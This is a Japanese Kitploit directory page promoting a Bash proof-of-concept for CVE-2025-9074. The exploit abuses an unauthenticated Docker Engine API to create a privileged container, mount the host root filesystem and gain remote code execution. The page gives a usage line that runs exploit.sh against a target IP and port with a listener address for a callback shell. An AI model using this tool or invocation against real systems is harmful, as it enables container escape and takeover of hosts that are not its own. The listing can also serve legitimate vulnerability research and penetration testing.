Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-9074-Poc — CVE-2025-9074向けのBashベースのPoCエクスプロイト。認証されていないDocker Engine APIを標的とし、特権ボリュームマウントを介してコンテナエスケープとリモートコード実行を実現します。 | Kitploit
ツール/GitHubGitHub/zaydbf/cve-2025-9074-poc
特権昇格脆弱性分析エクスプロイトペネトレーションテストリモートアクセスツールコンテナエスケープ
GitHubzaydbf/cve-2025-9074-poc

CVE-2025-9074-Poc

CVE-2025-9074向けのBashベースのPoCエクスプロイト。認証されていないDocker Engine APIを標的とし、特権ボリュームマウントを介してコンテナエスケープとリモートコード実行を実現します。

リポジトリを見る
8ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Docker API 未認証 RCE(CVE-2025-9074)

Docker Desktop における重大な脆弱性 CVE-2025-9074 は、ローカルで実行中の Linux コンテナがデフォルトのサブネット(192.168.65.7:2375)を介して Docker Engine API に接続できるようにします。この問題は、Enhanced Container Isolation(ECI)や TCP 公開設定に関係なく発生します。CVE-2025-9074 の Proof of Concept エクスプロイトコードは公開されています。この脆弱性により、ホストシステム上のユーザーファイルへの不正アクセスが可能になる可能性があります。したがって、リスクレベルは High Risk と評価されています。

認証なしで公開された Docker API(通常はポート 2375)を悪用するためのスタンドアロン Bash スクリプト。このツールは、ボリュームマウントを介したコンテナブレイクアウトを自動化し、リモートコード実行を可能にします。

特徴

  • 依存関係ゼロ: 標準ユーティリティ(curl や grep など)のみを使用して Bash で完全に実装されています。外部バイナリやサードパーティ製ツールは必要ありません。
  • 未認証での悪用: 認証なしで Docker Engine API と直接対話します。
  • コンテナ作成の自動化: 特権コンテナを自動的に作成して起動します。
  • ホストの root アクセス: ホストのルートファイルシステムをマウントしてコンテナエスケープを実現します。
  • 移植性: ツールが限られた最小限のコンテナ環境でも動作します。

使用方法

root@kitploit:~
chmod +x exploit.sh
./exploit.sh [TARGET_IP] [PORT] -l <listener_ip> -p <listener_port>

Proof Of Concept

image
ツールをダウンロード